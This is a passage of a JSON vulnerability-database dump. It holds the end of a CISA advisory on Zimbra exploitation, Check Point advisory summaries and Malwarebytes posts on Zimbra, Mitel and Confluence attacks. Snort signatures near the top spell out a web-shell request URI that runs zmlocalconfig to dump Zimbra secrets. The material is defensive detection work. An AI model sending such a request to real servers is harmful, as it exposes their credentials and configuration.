'QIHU 360SE'\"; sid:x; flow:established,to_server; content:\"POST\"; http_method; content:\"|2f|service|2f|extension|2f|backup|2f|mboximport\"; nocase; http_uri; content:\"QIHU|20|360SE\"; nocase; http_header; fast_pattern; classtype:http-header; reference:cve,2022-30333;)\n\nalert tcp any any -&gt; any any (msg:\"ZIMBRA:HTTP GET URI for Zimbra Local Config\"; sid:x; flow:established,to_server; content:\"/public/jsp/runas.jsp?pwd=zim&amp;i=/opt/zimbra/bin/zmlocalconfig|3a|-s\"; http_uri; classtype:http-uri; reference:cve,2022-30333;) \n\n * Deploy third-party YARA rules to detect malicious activity: \n * See [Volexity\u2019s Mass Exploitation of (Un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)\n\n### Mitigations\n\nCISA and the MS-ISAC recommend organizations upgrade to the latest ZCS releases as noted on [Zimbra Security \u2013 News &amp; Alerts](<https://wiki.zimbra.com/wiki/Security_Center>) and [Zimbra Security Advisories](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>).\n\nSee [Volexity\u2019s Mass Exploitation of (Un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) for mitigation steps.\n\nAdditionally, CISA and the MS-ISAC recommend organizations apply the following best practices to reduce risk of compromise:\n\n * **Maintain and test** an incident response plan.\n * **Ensure your organization has a vulnerability management program** in place and that it prioritizes patch management and vulnerability scanning of [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). **Note:** CISA\u2019s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations: [cisa.gov/cyber-hygiene-services](<https://www.cisa.gov/cyber-hygiene-services>). \n * **Properly configure and secure** internet-facing network devices. \n * Do not expose management interfaces to the internet.\n * Disable unused or unnecessary network ports and protocols.\n * Disable/remove unused network services and devices.\n * **Adopt [zero-trust principles and architecture](<https://www.cisa.gov/blog/2021/09/07/no-trust-no-problem-maturing-towards-zero-trust-architectures>)**, including: \n * Micro-segmenting networks and functions to limit or block lateral movements.\n * Enforcing phishing-resistant (MFA) for all users and virtual private network (VPN) connections.\n * Restricting access to trusted devices and users on the networks.\n\n### INCIDENT RESPONSE\n\nIf an organization\u2019s system has been compromised by active or recently active threat actors in their environment, CISA and the MS-ISAC recommend the following initial steps:\n\n 1. **Collect and review artifacts**, such as running processes/services, unusual authentications, and recent network connections.\n 2. **Quarantine or take offline potentially affected hosts**.\n 3. **Reimage compromised hosts**.\n 4. **Provision new account credentials**.\n 5. **Report the compromise** to CISA via CISA\u2019s 24/7 Operations Center ([report@cisa.gov](<mailto:report@cisa.gov>) or 888-282-0870). SLTT government entities can also report to the MS-ISAC ([SOC@cisecurity.org](<mailto:SOC@cisecurity.org>) or 866-787-4722).\n\nSee the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA and the MS-ISAC also encourage government network administrators to see CISA\u2019s [Federal Government Cybersecurity Incident and Vulnerability Response Playbooks](<https://cisa.gov/sites/default/files/publications/Federal_Government_Cybersecurity_Incident_and_Vulnerability_Response_Playbooks_508C.pdf>). Although tailored to federal civilian branch agencies, these playbooks provide detailed operational procedures for planning and conducting cybersecurity incident and vulnerability response activities.\n\n### ACKNOWLEDGEMENTS\n\nCISA and the MS-ISAC would like to thank Volexity and Secureworks for their contributions to this advisory.\n\n### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. CISA and the MS-ISAC do not provide any warranties of any kind regarding this information. CISA and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### References\n\n[[1] CVE-2022-27925 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>)\n\n[[2] Mass exploitation of (un)authenticated Zimbra RCE: CVE-2022-27925](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>)\n\n[[3] CVE-2022-37042 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>)\n\n[[4] Authentication bypass in MailboxImportServlet vulnerability](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>)\n\n[[5] CVE-2022-30333 detail](<https://nvd.nist.gov/vuln/detail/CVE-2022-30333>)\n\n[[6] UnRAR vulnerability exploited in the wild, likely against Zimbra servers](<https://www.securityweek.com/unrar-vulnerability-exploited-wild-likely-against-zimbra-servers>)\n\n[[7] Zimbra Collaboration Kepler 9.0.0 patch 25 GA release](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25>)\n\n[[8] Zimbra UnRAR path traversal](<https://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html>)\n\n[[9] Operation EmailThief: Active exploitation of zero-day XSS vulnerability in Zimbra](<https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/>)\n\n[[10] Hotfix available 5 Feb for zero-day exploit vulnerability in Zimbra 8.8.15](<https://blog.zimbra.com/2022/02/hotfix-available-5-feb-for-zero-day-exploit-vulnerability-in-zimbra-8-8-15/>)\n\n### Revisions\n\nAugust 16, 2022: Initial Version|August 22, 2022: Added Snort Signatures|August 23, 2022: Updated Detection Methods Snort Signatures|October 19, 2022: Added new Malware Analysis Report|November 10, 2022: Added new Malware Analysis Report\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-27T12:00:00", "type": "ics", "title": "Threat Actors Exploiting Multiple CVEs Against Zimbra Collaboration Suite", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24682", "CVE-2022-27924", "CVE-2022-27925", "CVE-2022-3033", "CVE-2022-30333", "CVE-2022-37042", "CVE-2023-27350"], "modified": "2023-01-27T12:00:00", "id": "AA22-228A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-228a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-08-17T05:59:07", "description": "A Directory Traversal vulnerability exists in Zimbra Collaboration. Successful exploitation of this vulnerability could allow a remote attacker to disclose or access arbitrary files on the vulnerable server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T00:00:00", "type": "checkpoint_advisories", "title": "Zimbra Collaboration Directory Traversal (CVE-2022-27925; CVE-2022-37042)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-16T00:00:00", "id": "CPAI-2022-0515", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-06-27T09:59:56", "description": "A command injection vulnerability exists in Mitel MiVoice Connect. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-27T00:00:00", "type": "checkpoint_advisories", "title": "Mitel MiVoice Connect Command Injection (CVE-2022-29499)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-27T00:00:00", "id": "CPAI-2022-0331", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-24T23:29:47", "description": "A hardcoded credentials vulnerability exists in Atlassian Questions for Confluence App. Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-08T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Questions for Confluence App Hardcoded Credentials (CVE-2022-26138)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-10T00:00:00", "id": "CPAI-2022-0467", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-20T19:05:33", "description": "A CRLF injection vulnerability exists in Zimbra Collaboration. Successful exploitation of this vulnerability could allow a remote attacker to damage users system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-20T00:00:00", "type": "checkpoint_advisories", "title": "Zimbra Collaboration CRLF Injection (CVE-2022-27924)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-07-20T00:00:00", "id": "CPAI-2022-0357", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-10-04T10:03:06", "description": "A remote code execution vulnerability exists in Atlassian Confluence. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-06T00:00:00", "type": "checkpoint_advisories", "title": "Atlassian Confluence Remote Code Execution (CVE-2022-26134)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-09-12T00:00:00", "id": "CPAI-2022-0297", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2022-08-18T00:02:01", "description": "Researchers at [Volexity](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) have discovered that a known vulnerability has been used in a large scale attack against Zimbra Collaboration Suite (ZCS) email servers. But the vulnerability was supposed to be hard to exploit since it required authentication. So they decided to dig deeper.\n\n## An incomplete fix\n\nZimbra is a brand owned by [Synacor](<https://synacor.com/about-us>). Zimbra Collaboration, formerly known as the Zimbra Collaboration Suite (ZCS) is a collaborative software suite that includes an email server and a web client. It is widely used across different industries and government organizations. We reported about a cross-site scripting (XSS) [zero-day vulnerability in the Zimbra email platform](<https://www.malwarebytes.com/blog/news/2022/02/threat-actor-steals-email-with-zimbra-zero-day>) back in February 2022. At the time, Zimbra claimed there were 200,000 businesses, and over a thousand government and financial institutions, using its software.\n\nThe initial investigations showed evidence indicating the likely cause of these breaches was exploitation of [CVE-2022-27925](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27925>), a remote-code-execution (RCE) vulnerability in ZCS. This vulnerability was patched by Zimbra in March 2022.\n\nThe description of the CVE informs us that Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has _mboximport_ functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal.\n\nZimbra patched the vulnerability, but, in the company's own words, it would turn out to be an \"incomplete fix for CVE-2022-27925\".\n\n## Mass exploitation\n\nIt is uncommon for a vulnerability that requires administrator rights to be used in a large-scale attack. Firstly, because it is usually a lot of work for a cybercriminal to obtain valid administrator credentials. But also because once they have administrator credentials there are a lot more options open to them. Although in this case, uploading zip files that will be auto-magically extracted sounds like a good way to establish a foothold.\n\nSo how did it come about that a serious, yet hard to exploit vulnerability got involved in a larger attack rather than a targeted one? The researchers did a lot of digging and found that the threat actors were chaining the known vulnerability with a zero-day path traversal vulnerability. The authentication bypass vulnerability was assigned [CVE-2022-37042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37042>) after sharing their findings with Zimbra. A path traversal vulnerability allows an attacker to access files on your web server to which they should not have access.\n\nThe underlying problems was that the authentication check, after sending an error message to the unauthenticated attacker, continued executing the subsequent code. So, even though the attackers received an error message the web shell was planted on the server anyway. These web shells were a malicious script used by the attacker with the intent to escalate and maintain persistent access. In other words, a backdoor.\n\nKnowing the paths to which the attacker had installed web shells, and the behavior of ZCS when contacting a URL that did not exist, the researchers performed a scan of ZCS instances in the wild to identify third-party compromises using the same web shell names. This scan yielded over 1,000 infected ZCS instances worldwide. The real number of infected instances is probably a lot higher since the scan only looked for shell paths known to the researchers.\n\n## Mitigation\n\nZimbra has patched the authentication issue in its [9.0.0P26](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P26>) and [8.8.15P33](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P33>) releases. If you were late to patch for the RCE vulnerability, you should assume that your server instance has been compromised.\n\nIn order to verify the presence of web shells on a ZCS instance, one technique that can be used is to compare the list of JSP files on a Zimbra instance with those present by default in Zimbra installations. Lists of valid JSP files included in Zimbra installations can be found [on GitHub](<https://github.com/volexity/threat-intel/tree/main/2022/2022-08-10%20Mass%20exploitation%20of%20\\(Un\\)authenticated%20Zimbra%20RCE%20CVE-2022-27925>) for the latest version of 8.8.15 and of 9.0.0.\n\n## Update August 17, 2022\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing &amp; Analysis Center (MS-ISAC) hace published a joint [Cybersecurity Advisory (CSA)](<https://www.cisa.gov/uscert/sites/default/files/publications/aa22-228a-threat-actors-exploiting-multiple-cves-against-zimbra.pdf>) in response to the active exploitation of the vulnerabilities in the Zimbra Collaboration Suite (ZCS).\n\nStay safe, everyone!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T13:00:00", "type": "malwarebytes", "title": "[updated] Thousands of Zimbra mail servers backdoored in large scale attack", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T13:00:00", "id": "MALWAREBYTES:FD1933FDD45B339A42C8A69C46589A0D", "href": "https://www.malwarebytes.com/blog/news/2022/08/thousands-of-zimbra-mail-servers-backdoored-in-large-scale-attack", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-16T00:11:16", "description": "Ransomware gangs have shown that they can play a long game, so it shouldn&#x27;t come as a surprise to learn of one prepared to wait months to make use of a compromised system.\n\nS-RM&#x27;s Incident Response team [shared details](<https://insights.s-rminform.com/lorenz-cyber-intelligence-briefing-special>) of a campaign attributed to the Lorenz ransomware group that exploited a specific vulnerability to plant a backdoor that wasn't used until months later.\n\n## Lorenz\n\nThe Lorenz ransomware group first appeared on the radar in 2021. They have targeted organizations all over the world and are known to specialize in VoIP vulnerabilities to access their victims' environments. Like many ransomware groups, they steal their victim's data before encrypting it, so they can add the threat of leaked data to the threat of encryption making it irrecoverable.\n\n## Vulnerability\n\nThe researchers found in a specific case that the Lorenz group was able to exploit a vulnerability listed as [CVE-2022-29499](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29499>) a week prior to it being patched. This vulnerability, which has a CVSS score of 9.8 out of 10, exists in the Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 and allows remote code execution because of incorrect data validation. Essentially the vulnerability allowed an unauthenticated remote attacker to send specially crafted requests to inject commands and achieve remote code execution.\n\n## Exploited\n\nAfter a vulnerability has been [discovered](<https://www.crowdstrike.com/blog/novel-exploit-detected-in-mitel-voip-appliance/>) and [patched](<https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002>), it is not uncommon for organizations to wait for a convenient moment to apply the patch. But as soon as a patch is made available threat actors have the opportunity to reverse engineer it, find the vulnerability, create an exploit, and then scan for vulnerable systems. Its exactly this window of opportunity that the Lorenz ransomware group managed to exploit, in order to install a web shell on the vulnerable system. This web shell has a unique name and requires credentials to access the system.\n\nThe shell was placed some five months before the actual ransomware event, and sat dormant throughout that period. Whether the backdoor was created by an [Initial Access Broker (IAB)](<https://www.malwarebytes.com/blog/business/2022/11/initial-access-brokers-iabs-3-ways-they-break-into-corporate-networks-and-how-to-detect-them>) and then sold on to the ransomware group or whether the Lorenz group created it themselves is unknown. But the results is the same.\n\n## Why wait?\n\nThe time between the compromise and the deployment of the ransomware can be explained by several theories.\n\n * The backdoor was planted by an IAB that waited for the right offer to sell off their access to the compromised system.\n * When an easy to exploit vulnerability is available, a group will first compromise as many systems as possible and later work their way through the list of victims.\n * With the initial breach the threat actor replaced several key artefacts on the perimeter CentOS system, effectively blocking the creation of any additional logging or audit data. After a while old logs will be deleted and no new ones are created, which improves the attacker's chances of going in undetected.\n\n## Patching\n\nBesides showing us how important it is to [patch in a timely fashion](<https://www.malwarebytes.com/business/vulnerability-patch-management>), this vulnerability has shown us that patching alone is not always enough.\n\nVictims were made with this vulnerability before there was a patch available. The vulnerability was found by investigating a suspected ransomware intrusion attempt, so there was at least one group that was able to use the vulnerability when it was still a [zero-day](<https://www.malwarebytes.com/glossary/zero-day>).\n\nThe exploit details were published in June and the victim patched in July but was compromised a week prior to patching. So, the backdoor was planted during the time between the patch being released and it actually getting installed, the so called \"patch gap\".\n\n## Monitoring\n\nSo, what else do we need to do in case we patch a vulnerable system? A difficult question with no easy cure-all answer. But there are some pieces of advice we can give:\n\n * Keep the patch gap as small as possible. We know it&#x27;s not easy, but it helps a lot.\n * Check vulnerable devices before and after patching for indicators of compromise (IOCs). They may not always be available, but when it concerns a vulnerability that's known to have been exploited you may be able to find the IOCs or figure out where to look.\n * Constant monitoring. If you didn&#x27;t find the backdoor, make sure you have the capabilities to find the tools threat actors use for lateral movement, and block the final payload (ransomware in this case).\n * Look for unauthorized access or atypical behavior originating from the recently patched device/system.\n\n* * *\n\n**We don&#x27;t just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. Keep threats off your devices by [downloading Malwarebytes today](<https://www.malwarebytes.com/for-home>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-15T18:45:00", "type": "malwarebytes", "title": "Timely patching is good, but sometimes it's not enough", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2023-01-15T18:45:00", "id": "MALWAREBYTES:58E222D9BD3FC1273D169FE26CA6D804", "href": "https://www.malwarebytes.com/blog/news/2023/01/timely-patching-is-good-but-does-not-provide-full-ransomware-protection", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-03T21:56:15", "description": "[Researchers](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) found a vulnerability in Atlassian Confluence by conducting an incident response investigation. Atlassian rates the severity level of this vulnerability as critical.\n\nAtlassian has issued a [security advisory ](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>)and is working on a fix for the affected products. This qualifies the vulnerability as an actively exploited in the wild zero-day vulnerability.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed as [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>).\n\n## Confluence\n\nAtlassian Confluence is a collaboration tool in wiki style. Confluence is a team collaboration platform that connects teams with the content, knowledge, and their co-workers, which helps them find all the relevant information in one place. Teams use it to work together on projects and share knowledge.\n\nConfluence Server is the on-premises version which is being phased out. Confluence Data Center is the self-managed enterprise edition of Confluence.\n\n## The vulnerability\n\nThe description of CVE-2022-26134 says it is a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center.\n\nDuring the investigation, the researchers found JSP web shells written to disk. JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. JSP is similar to PHP and ASP, but uses the Java programming language.\n\nIt became clear that the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. The researchers were able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.\n\nAfter the researchers contacted Atlassian, Atlassian confirmed the vulnerability and subsequently assigned the issue to CVE-2022-26134. It confirmed the vulnerability works on current versions of Confluence Server and Data Center.\n\n## The attack\n\nThe researchers at Volexity were unwilling to provide any details about the attack method since there is no patch available for this vulnerability. However, they were able to provide some details about the shells that were dropped by exploiting the vulnerability.\n\nA web shell is a a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\nThis web shell was identified as the China Chopper web shell. The China Chopper web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. The web shell has two parts, the client interface and the small (4 kilobytes in size) receiver host file on the compromised web server. But access logs seemed to indicate that the China Chopper web only served as a means of secondary access.\n\nOn further investigation they found bash shells being launched by the Confluence web application process. This stood out because it had spawned a bash process which spawned a Python process that in turn spawned a bash shell. Bash is the default shell for many Linux distros and is short for the GNU Bourne-Again Shell.\n\nResearch showed that the web server process as well as the child processes created by the exploit were all running as root (with full privileges) user and group. These types of vulnerabilities are dangerous, as it allows attackers to execute commands and gain full control of a vulnerable system. They can even do this without valid credentials as long as it is possible to make web requests to the Confluence system.\n\nAfter successfully exploiting the Confluence Server systems, the attacker immediately deployed an in-memory copy of the BEHINDER implant. BEHINDER provides very powerful capabilities to attackers, including memory-only web shells and built-in support for interaction with [Meterpreter](<https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/>) and [Cobalt Strike](<https://blog.malwarebytes.com/glossary/cobalt-strike/>).\n\n## Mitigation\n\nThere are currently no fixed versions of Confluence Server and Data Center available. In the interim, users should work with their security team to consider the best course of action. Options to consider include:\n\n * Restricting access to Confluence Server and Data Center instances from the internet.\n * Disabling Confluence Server and Data Center instances.\n * If you are unable to take the above actions, implementing a WAF (Web Application Firewall) rule which blocks URLs containing **${** may reduce your risk.\n\n_Note: **${** is the first part of a parameter substitution in a shell script_\n\n## Affected versions\n\nAll supported versions of Confluence Server and Data Center are affected. And according to Atlassian it\u2019s likely that **all** versions of Confluence Server and Data Center are affected, but they are still investigating and have yet to confirm the earliest affected version.\n\nOne important exception: if you access your Confluence site via an atlassian.net domain. This means it is hosted by Atlassian and is not vulnerable.\n\nWe will keep you posted about the developments, so stay tuned.\n\n## Update June 3, 2022\n\nAtlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a fix for this issue.\n\n**What You Need to Do**\n\nAtlassian recommends that you upgrade to the latest Long Term Support release. For a full description of the latest version, see the [Confluence Server and Data Center Release Notes](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>). You can download the latest version from the [download centre](<https://www.atlassian.com/software/confluence/download-archives>).\n\nThe post [[updated]Unpatched Atlassian Confluence vulnerability is actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": 